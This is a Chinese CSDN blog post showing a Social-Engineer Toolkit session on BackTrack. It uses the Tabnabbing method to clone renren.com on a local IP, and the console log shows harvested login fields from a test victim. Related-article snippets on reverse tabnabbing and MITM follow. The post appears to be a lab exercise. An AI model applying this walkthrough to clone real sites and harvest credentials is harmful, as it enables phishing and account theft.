用Tabnabbing Attack Method登录人人网

最新推荐文章于 2024-03-26 11:32:32 发布
最新推荐文章于 2024-03-26 11:32:32 发布
阅读量1.7k 收藏
点赞数
分类专栏: metasploit backtrack SET python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/feier7501/article/details/9151627
版权
backtrack 同时被 3 个专栏收录
78 篇文章 0 订阅
订阅专栏
metasploit
73 篇文章 0 订阅
订阅专栏
SET
19 篇文章 0 订阅
订阅专栏

用刚才的脚本,然后输出如下:

 Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) SMS Spoofing Attack Vector
   8) Wireless Access Point Attack Vector
   9) QRCode Generator Attack Vector
  10) Powershell Attack Vectors
  11) Third Party Modules

  99) Return back to the main menu.

set> 2

 The Web Attack module is  a unique way of utilizing multiple web-based attacks
 in order to compromise the intended victim.

 The Java Applet Attack method will spoof a Java Certificate and deliver a 
 metasploit based payload. Uses a customized java applet created by Thomas
 Werth to deliver the payload.

 The Metasploit Browser Exploit method will utilize select Metasploit
 browser exploits through an iframe and deliver a Metasploit payload.

 The Credential Harvester method will utilize web cloning of a web-
 site that has a username and password field and harvest all the 
 information posted to the website.

 The TabNabbing method will wait for a user to move to a different
 tab, then refresh the page to something different.

 The Man Left in the Middle Attack method was introduced by Kos and 
 utilizes HTTP REFERER's in order to intercept fields and harvest 
 data from them. You need to have an already vulnerable site and in-
 corporate <script src="http://YOURIP/">. This could either be from a
 compromised site or through XSS.

 The Web-Jacking Attack method was introduced by white_sheep, Emgent 
 and the Back|Track team. This method utilizes iframe replacements to 
 make the highlighted URL link to appear legitimate however when clicked 
 a window pops up then is replaced with the malicious link. You can edit
 the link replacement settings in the set_config if its too slow/fast.

 The Multi-Attack method will add a combination of attacks through the web attack
 menu. For example you can utilize the Java Applet, Metasploit Browser,
 Credential Harvester/Tabnabbing, and the Man Left in the Middle attack
 all at once to see which is successful.

   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Man Left in the Middle Attack Method
   6) Web Jacking Attack Method
   7) Multi-Attack Web Method
   8) Victim Web Profiler
   9) Create or import a CodeSigning Certificate

  99) Return to Main Menu

set:webattack>4

 The first method will allow SET to import a list of pre-defined web 
 applications that it can utilize within the attack.

 The second method will completely clone a website of your choosing
 and allow you to utilize the attack vectors within the completely
 same web application you were attempting to clone.

 The third method allows you to import your own website, note that you
 should only have an index.html when using the import website
 functionality.
   
   1) Web Templates
   2) Site Cloner
   3) Custom Import

  99) Return to Webattack Menu

set:webattack>2
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.1.11
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:www.renren.com

[*] Cloning the website: http://www.renren.com
[*] This could take a little bit...
Modified successfully

The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[!] I have read the above message.

      Press <return> to continue


[*] Tabnabbing Attack Vector is Enabled...Victim needs to switch tabs.
[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:
192.168.1.142 - - [28/Apr/2013 05:49:52] "GET / HTTP/1.1" 200 -
192.168.1.142 - - [28/Apr/2013 05:50:44] "GET /index2.html HTTP/1.1" 200 -
[*] WE GOT A HIT! Printing the output:
POSSIBLE USERNAME FIELD FOUND: email=yangyang@gmail.com
POSSIBLE PASSWORD FIELD FOUND: password=set
PARAM: icode=
PARAM: origURL=http://www.renren.com/home
PARAM: domain=renren.com
PARAM: key_id=1
POSSIBLE USERNAME FIELD FOUND: captcha_type=web_login
[*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.






feier7501
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
Reverse Tabnabbing钓鱼
SoulCat
02-27 1418
Reverse Tabnabbing钓鱼 希望你以后能过得好,别辜负我一生不打扰 文章目录Reverse Tabnabbing钓鱼原理:利用:修复: 原理: 使用正常站A的a标签设置为恶意站B,恶意站B中利用window.opener修改原先页面A页面,进而无征兆把访问正常站A页面修改为钓鱼站C页面。 两个可以利用点: 1、使用a标签,并且target=_blank,没有使用re...
metasploit的SET的Credential Harvester Attack Method
天元喜羊羊的博客
05-29 1419
环境:BT5,XP或者Win7,IE6、IE8、谷歌浏览器 操作如下: root@bt:/pentest/exploits/set# ./set 01011001011011110111010100100000011100 10011001010110000101101100011011000111 1001
Credential Harvester Attack Method获得用户信息
天元喜羊羊的博客
06-20 2610
前段时间在学习SET,发现Credential Harvester Attack Method一直无法获得登录的用户名和密码,一开始用wireshark抓包来调试,的确没有相应的数据,后来怀疑是代码的问题,于是查看python代码。本人没学过python,因此还不得不去学习一下python。今天看代码,看到cloner.py的代码有问题。于是修改之,增加了一个新的模块: #!/usr/bin
浅谈对tabnabbing漏洞的理解和利用
SoporAeternus12的博客
04-05 3868
最近在打vulnhub上的靶机的时候卡在了某个点,后来我去上搜索相关攻略,发现了一个叫reverse tabnabbing的漏洞,由于我之前并没有学习过这个漏洞,所以写了这篇文章来记录一下对这个漏洞的学习成果。 漏洞原理和介绍 tabnabbing是一种钓鱼攻击漏洞,上将该漏洞翻译为反向标签劫持攻击,大致原理就是黑客通过某种方法在页面A中植入一个a标签,也就是一个超链接,链接的指向是黑客精心准备的页面B,页面B的内容有一个javascript代码,内容就是window.opener.location=“
Metasploit系列----基础命令
bronze_s的博客
04-25 150
use : 指定设置的模块 show: 显示可用的模块或选项 set: 设定选项或模块 run | exploit : 启动模块 back: 取消当前指定模块,并返回上级窗口 info: 查看模块信息 search: 搜索符合条件的模块 cheak: 检查制定目标是否存在可用漏洞,并能被exploit利用 session: 列举当前可用会话 使用meterpreter作为payload时,会获得metereprter会话。常用命令 sysinfo: 列举被渗透主机的系统信息。 ifconfig: 列.
Tabnabbing Fighter:Phishing Attack Protection-crx插件
03-23
Tabnabbing与大多数络钓鱼攻击的不同之处在于,用户不再记得某个选项卡是与登录页面无关的链接的结果,因为假冒的登录页面已加载到浏览器中一个长期打开的选项卡中。我们不希望的是,当我们不浏览时,我们一直在...
LearningSecurity
03-17
路同源策略HTTP请求头SSL / TLSXSSXXE标签页劫持(Tabnabbing) SQL注入宽字节注入DOS版重做慢速HTTP正则表达式盲注文件上传反映文件下载拉链炸弹CRLFCSRFSSRF罪行投毒拒绝服务HTTP请求走私WebShell的MISC作业...
信息安全_浏览器魔术.pptx
08-14
页面标签欺骗,也称为Tabnabbing,是一种攻击手段,当用户离开标签页后,攻击者会篡改标签的图标、标题和内容。当用户返回标签页时,由于视觉欺骗,他们可能会误认为是原来的页,从而在伪造的页面上输入敏感信息。...
git提交时报错解决
qq_41040268的博客
05-27 3160
博客专区 &gt; Canaan_ 的博客 &gt; 博客详情fatal: unable to get credential storage lock: File existsCanaan_ 发表于9个月前   原fatal: unable to get credential storage lock: File exists描述: 设置了.git/config [credential]    h...
人人被卖,这些回忆杀总有一个能让你流泪
xinmei6的博客
11-15 3093
2000W 美金,人人就这么被卖了。 听到这则消息后,很多人都忍不住一阵唏嘘。 也有人登上了自己几年没有上过的人人,尘封的记忆就在不经意间被打开。 他们曾是腼腆的少年,却在人人上勇敢向校花表白; 他们曾是矫情的少女,屁大点事都在要人人上吐槽; 他们曾是叛逆的非主流,在人人上发过杀马特照片; 今天,我们采访了几个人人曾经的用户,共同追寻关于这个平台的回忆。 01你最怀念的功能是什...
人人登陆页面
05-13
使用web 中的div+css开发的人人的登陆页面,几乎完全一样
大学生页制作期末作业——HTML+CSS+JavaScript制作成都旅游页设计与实现12个页面 web前端课程设计代码 web课程设计 HTML页制作代码
网页设计与制作 | HTML+CSS+JS
11-14 329
👨‍🎓静态站的编写主要是用 HTML DⅣV+ CSSJS等来完成页面的排版设计👩‍🎓,一般的页作业需要融入以下知识点:div布局、浮动定位、高级css、表格、表单及验证、js轮播图、音频视频Fash的应用、uli、下拉导航栏、鼠标划过效果等知识点,学生页作业源码,制作水平和原创度都适合学习或交作业用,记得点赞。 🏀 精彩专栏推荐👇🏻👇🏻👇🏻 💝 【作者主页——🔥获取更多优质源码】 💝 【web前端期末大作业——🔥🔥毕设项目精品实战案例(1000套)】🚀 旅游景
大学生页作业成品——基于HTML上书城项目的设计与实现
专注于dreamweaver网页设计制作
08-12 1460
⚽精彩专栏推荐👇🏻👇🏻👇🏻 ❤ 【作者主页——🔥获取更多优质源码】 ❤ 【web前端期末大作业——🔥🔥毕设项目精品实战案例(1000套)】1 页简介:此作品为学生个人主页页设计题材,HTML+CSS 布局制作,web前端期末大作业,大学生页设计作业源码,这是一个不错的页制作,画面精明,代码为简单学生水平, 非常适合初学者学习使用。2.页编辑:页作品代码简单,可使用任意HTML编辑软件(如:Dreamweaver、HBuilder、Vscode 、Sublime 、Web......
web期末作业页设计实例代码 (建议收藏) HTML+CSS+JS (页源码)
最新发布
网页设计与制作
03-26 7978
📔站布局方面:计划采用目前主流的、能兼容各大主流浏览器、显示效果稳定的浮动页布局结构。📓站程序方面:计划采用最新的页编程语言HTML5+CSS3+JS程序语言完成站的功能设计。并确保站代码兼容目前市面上所有的主流浏览器,已达到打开后就能即时看到站的效果。📘站素材方面:计划收集各大平台好看的图片素材,并精挑细选适合页风格的图片,然后使用PS做出适合页尺寸的图片。📒站文件方面:站系统文件种类包含:html页结构文件、css页样式文件、js页特效文件、images页图片文件;
人人主页登录_人人被卖,这些回忆杀总有一个能让你流泪
weixin_40001442的博客
11-10 3303
2000W 美金,人人就这么被卖了。听到这则消息后,很多人都忍不住一阵唏嘘。也有人登上了自己几年没有上过的人人,尘封的记忆就在不经意间被打开。他们曾是腼腆的少年,却在人人上勇敢向校花表白;他们曾是矫情的少女,屁大点事都在要人人上吐槽;他们曾是叛逆的非主流,在人人上发过杀马特照片;今天,我们采访了几个人人曾经的用户,共同追寻关于这个平台的回忆。01 你最怀念的功能是什么?@蛋蛋感觉人人有很多...
用DIV+CSS技术制作一个简单的页 我的家乡主题
网页设计与制作
01-04 349
⚽精彩专栏推荐👇🏻👇🏻👇🏻 ❤ 【作者主页——🔥获取更多优质源码】 ❤ 【web前端期末大作业——🔥🔥毕设项目精品实战案例(1000套)】1 页简介:此作品为学生个人主页页设计题材,HTML+CSS 布局制作,web前端期末大作业,大学生页设计作业源码,这是一个不错的页制作,画面精明,代码为简单学生水平, 非常适合初学者学习使用。2.页编辑:页作品代码简单,可使用任意HTML编辑软件(如:Dreamweaver、HBuilder、Vscode 、Sublime 、Web
初探MITM-中间人攻击
热门推荐
要不,单步调试走起?
12-12 2万+
BT5r3下初探中间人攻击,ARP欺骗aprspoof或ettercap,DNS欺骗,hamster会话劫持,SSL会话劫持
div+css页html成品学生作业包含10个html页面——动漫主题海贼王
QQ_____365392777的博客
08-10 4916
1 页简介:此作品为学生个人主页页设计题材,HTML+CSS 布局制作,web前端期末大作业,大学生页设计作业源码,这是一个不错的页制作,画面精明,代码为简单学生水平, 非常适合初学者学习使用。2.页编辑:页作品代码简单,可使用任意HTML编辑软件(如:Dreamweaver、HBuilder、Vscode 、Sublime 、Webstorm、Text 、Notepad++ 等任意html编辑软件进行运行及修改编辑等操作)。3.知识应用:技术方面主要应用了页知识中的: Div+CSS、鼠标滑
setoolkit的钓鱼攻击
qq_41862216的博客
05-31 1067
<利用kali中setoolkit工具制作简易钓鱼站> 首先打开我们所需要的工具 setoolkit //打开工具 会跳出很多选项 Social-Engineering Attacks ##社会工程学攻击 Penetration Testing (Fast-Track) ##快速追踪测试 Third Party Modules ##第三方模块 Update the Social-Engineer Toolkit ##升级软件 Update SET configura.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值